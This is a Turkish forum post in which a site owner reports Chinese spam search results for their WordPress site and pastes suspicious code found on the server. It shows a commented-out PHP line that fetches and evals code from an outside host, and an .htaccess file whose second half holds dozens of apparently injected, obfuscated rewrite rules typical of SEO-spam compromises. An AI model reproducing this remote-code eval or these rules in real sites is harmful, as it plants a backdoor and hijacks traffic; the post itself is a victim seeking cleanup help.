Koineks
 • 27-04-2017, 01:21:00
  #1
  1/2
  Merhabalar arkadaşlar İmzamda ki sitemi Google da aradığımda çince sonuçlar çıkıyor ve hepsi birbirinden saçma.

  function.php kontrol ettiğimde şu vardı
  //eval(@file_get_contents("http://yakaladimsizi.com/x.txt"));

  .htaccess`i kontrol ettiğimde böyle şeyler var.

  # BEGIN GzipWpFastestCache
  <IfModule mod_deflate.c>
  AddType x-font/woff .woff
  AddOutputFilterByType DEFLATE image/svg+xml
  AddOutputFilterByType DEFLATE text/plain
  AddOutputFilterByType DEFLATE text/html
  AddOutputFilterByType DEFLATE text/xml
  AddOutputFilterByType DEFLATE text/css
  AddOutputFilterByType DEFLATE text/javascript
  AddOutputFilterByType DEFLATE application/xml
  AddOutputFilterByType DEFLATE application/xhtml+xml
  AddOutputFilterByType DEFLATE application/rss+xml
  AddOutputFilterByType DEFLATE application/javascript
  AddOutputFilterByType DEFLATE application/x-javascript
  AddOutputFilterByType DEFLATE application/x-font-ttf
  AddOutputFilterByType DEFLATE application/vnd.ms-fontobject
  AddOutputFilterByType DEFLATE font/opentype font/ttf font/eot font/otf
  </IfModule>
  # END GzipWpFastestCache
  # BEGIN WordPress
  <IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteBase /
  RewriteRule ^index\.php$ - [L]
  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteRule . /index.php [L]
  </IfModule>
  # END WordPress
  # Enable GZIP
  <ifmodule mod_deflate.c>
  AddOutputFilterByType DEFLATE text/text text/html text/plain text/xml text/css application/x-javascript application/javascript
  BrowserMatch ^Mozilla/4 gzip-only-text/html
  BrowserMatch ^Mozilla/4\.0[678] no-gzip
  BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
  </ifmodule>
  # Expires Headers - 2678400s = 31 days
  <ifmodule mod_expires.c>
  ExpiresActive On
  ExpiresDefault "access plus 1 seconds"
  ExpiresByType text/html "access plus 7200 seconds"
  ExpiresByType image/gif "access plus 2678400 seconds"
  ExpiresByType image/jpeg "access plus 2678400 seconds"
  ExpiresByType image/png "access plus 2678400 seconds"
  ExpiresByType text/css "access plus 518400 seconds"
  ExpiresByType text/javascript "access plus 2678400 seconds"
  ExpiresByType application/x-javascript "access plus 2678400 seconds"
  </ifmodule>
  # Cache Headers
  <ifmodule mod_headers.c>
  # Cache specified files for 31 days
  <filesmatch "\.(ico|flv|jpg|jpeg|png|gif|css|swf)$">
  Header set Cache-Control "max-age=2678400, public"
  </filesmatch>
  # Cache HTML files for a couple hours
  <filesmatch "\.(html|htm)$">
  Header set Cache-Control "max-age=7200, private, must-revalidate"
  </filesmatch>
  # Cache PDFs for a day
  <filesmatch "\.(pdf)$">
  Header set Cache-Control "max-age=86400, public"
  </filesmatch>
  # Cache Javascripts for 31 days
  <filesmatch "\.(js)$">
  Header set Cache-Control "max-age=2678400, private"
  </filesmatch>
  </ifmodule>
  php_value display_errors on
  RewriteEngine On
  ReWriteCond %{HTTP_HOST} ^(www\.)?siteminadi\.com/blog/$ [NC]
  ReWriteRule ^(.*)$ http://www.siteminadi.com/$1 [R=301,L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-[0-9]+-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-[0-9]+-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-%[0-9]+-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+).*-.*-.*-.*..*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*_.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+_[0-9]+&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-[0-9]+..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-[0-9]+-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-[0-9]+-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*[0-9]+-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F[0-9]+-.*-.*-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-[0-9]+-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-.*-.*-.*..*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*..*\/.*-[0-9]+-[0-9]+-.*-.*-.*-.*-[0-9]+$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-[0-9]+-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F[0-9]+-.*-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+..*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+%[0-9]+([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%(.*)([^\d\/]+)%[0-9]+([^\d\/]+)%(.*)[0-9]+%[0-9]+%[0-9]+F%(.*)[0-9]+%[0-9]+%[0-9]+([^\d\/]+)%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+([^\d\/]+)%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%([^\d\/]+)([^\d\/]+)%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)(.*)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+..*$ ?$44$4=$42&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*..*%[0-9]+F.*-.*-[0-9]+&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+(.*)%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%([^\d\/]+)[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%[0-9]+%(.*)(.*)%(.*)[0-9]+%[0-9]+([^\d\/]+)%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%([^\d\/]+)(.*)%[0-9]+([^\d\/]+)%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+..*$ ?$43$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+([^\d\/]+)%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+-[0-9]+..*$ ?$41$35=$29&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*..*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+([^\d\/]+)%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+..*$ ?$41$35=$29&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([^\d\/]+)(.*)%(.*)[0-9]+%([^\d\/]+)([0-9]+)%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+F%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+%[0-9]+(.*)%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%([^\d\/]+)(.*)%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+F..*$ ?$36$29=$10&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*..*%[0-9]+F.*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+-.*-.*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*[0-9]+-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F[0-9]+-[0-9]+-[0-9]+-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*..*%[0-9]+F.*-.*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F%[0-9]+.*[0-9]+%[0-9]+%[0-9]+.*[0-9]+%[0-9]+.*[0-9]+%[0-9]+%[0-9]+.*[0-9]+.*-.*-.*-.*-.*%[0-9]+.*[0-9]+%[0-9]+%[0-9]+.*[0-9]+%[0-9]+.*[0-9]+%[0-9]+%[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*[0-9]+-.*-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*IZ..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*F..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*..*%[0-9]+F.*_.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+_[0-9]+&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F[0-9]+.*-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)..*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+..*&.*=.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*..*%[0-9]+F.*-.*-[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*[0-9]+-.*-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([^\d\/]+)(.*)%(.*)[0-9]+%([^\d\/]+)([0-9]+)%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+F%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+([^\d\/]+)%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+-[0-9]+..*$ ?$35$29=$10&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*[0-9]+-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+([^\d\/]+)%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+..*$ ?$40$34=$28&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/.*T.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/.*T.*\?.*_.*=.*&.*=.*%[0-9]+(.*)%[0-9]+F%[0-9]+F.*-.*..*%[0-9]+F$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+..*&.*=.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*[0-9]+-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+..*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*[0-9]+-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*Q..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-TOP..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-K.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*..*%[0-9]+F[0-9]+_[0-9]+_[0-9]+_.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-[0-9]+-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+%[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+).*-.*-.*-.*-.*..*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+([0-9]+).*%[0-9]+.*=$ ?$2$5=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+%[0-9]+(.*)%(.*)[0-9]+%([^\d\/]+)(.*)%([^\d\/]+)(.*)%(.*)[0-9]+%([^\d\/]+)([0-9]+)%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+F%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+F%(.*)[0-9]+%[0-9]+%[0-9]+(.*)%(.*)[0-9]+%[0-9]+%[0-9]+F%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+F%(.*)[0-9]+%[0-9]+%[0-9]+(.*)%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+F%(.*)[0-9]+%[0-9]+%[0-9]+F%(.*)F%([^\d\/]+)([0-9]+)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+([^\d\/]+)%([^\d\/]+)[0-9]+..*$ ?$59$55=$12&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+).*[0-9]+\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)_[0-9]+\?.*=UTF[0-9]+&.*=[0-9]+&.*=[0-9]+-[0-9]+&.*=%(.*)[0-9]+%[0-9]+F%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+F%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+(.*)$ ?$14$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-.*-.*-.*JP..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*([0-9]+)S..*$ ?$1$3=$4&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)..*\?.*=.*&.*=.*&.*&.*=R.*V.*H.*&.*&.*=.*&.*=.%[0-9]+F&.*=.*&.*=.*[0-9]+&.*=.*%[0-9]+&H$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+).*[0-9]+..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*%([0-9]+)([0-9]+)%[0-9]+-.*..*$ ?$2$5=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*..*\/.*-.*-.*-.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-.*-.*-.*-.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*-[0-9]+&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*..*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+-.*-.*-[0-9]+-.*-.*-.*-.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)_[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)_[0-9]+\?.*=UTF[0-9]+&.*=[0-9]+&.*=[0-9]+-[0-9]+&.*=%(.*)[0-9]+%[0-9]+%([^\d\/]+)F%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)(.*)%(.*)[0-9]+%[0-9]+%(.*)(.*)%(.*)[0-9]+%(.*)(.*)%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+$ ?$20$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*..*%[0-9]+F.*-.*-.*-.*-.*-.*[0-9]+.*[0-9]+.*-.*[0-9]+&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-.*-.*-.*..*\?.*=[0-9]+$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*..*\?.*=[0-9]+$ ?$1$3=$2&%{QUERY_STRING}[L]
